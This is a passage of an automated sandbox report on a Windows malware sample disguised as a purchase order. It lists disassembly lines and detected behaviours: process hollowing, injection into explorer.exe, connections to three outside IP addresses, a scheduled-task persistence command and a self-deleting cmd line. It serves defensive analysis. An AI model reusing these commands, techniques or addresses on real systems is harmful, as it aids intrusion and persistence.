            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0347DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034937F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03461B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03461B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0350D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03468794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0351138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03482397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03484BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03484BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03484BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03525BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03459240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03459240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03459240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03459240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034E4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0350B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0350B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03528A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0349927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0347AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0347AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0347AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0347AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0347AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03488E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03468A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03455210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03455210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03455210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03455210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03511608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03473A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03494A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03494A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0350FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03482ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03528ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034836CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03498EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0350FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034676E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034816E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03482AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034EFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03520EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03520EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03520EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0347B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0347B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03493D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03477D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0347C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0347C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03459100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03459100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03459100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03528D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03474120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03474120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03474120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03474120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03474120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03484D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03484D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03484D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034DA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03508DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034E41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0347C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03482581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03482581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03482581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03482581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03452D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03452D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03452D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03452D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03452D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03482990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034861A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034861A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034835A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03481DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03481DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03481DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_035205AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_035205AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03470050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03470050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034EC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034EC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03512073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03521074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0347746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03524015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03524015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0352740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0352740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0352740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03528CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034EB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\PO_210223.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\PO_210223.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 204.11.56.48 80
            Source: C:\Windows\explorer.exeNetwork Connect: 103.66.59.142 80
            Source: C:\Windows\explorer.exeNetwork Connect: 23.229.197.103 80
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\PO_210223.exeMemory written: C:\Users\user\Desktop\PO_210223.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\PO_210223.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\PO_210223.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\PO_210223.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\PO_210223.exeThread register set: target process: 3424
            Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3424
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\PO_210223.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\PO_210223.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: E50000
            Source: C:\Users\user\Desktop\PO_210223.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp'
            Source: C:\Users\user\Desktop\PO_210223.exeProcess created: C:\Users\user\Desktop\PO_210223.exe C:\Users\user\Desktop\PO_210223.exe
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_210223.exe'
            Source: explorer.exe, 0000000A.00000002.907526127.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 0000000A.00000000.679171156.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000D.00000002.911200125.00000000048C0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 0000000A.00000000.679171156.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000D.00000002.911200125.00000000048C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000A.00000000.679171156.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000D.00000002.911200125.00000000048C0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 0000000A.00000000.679171156.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000D.00000002.911200125.00000000048C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 0000000A.00000000.695811785.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Users\user\Desktop\PO_210223.exe VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
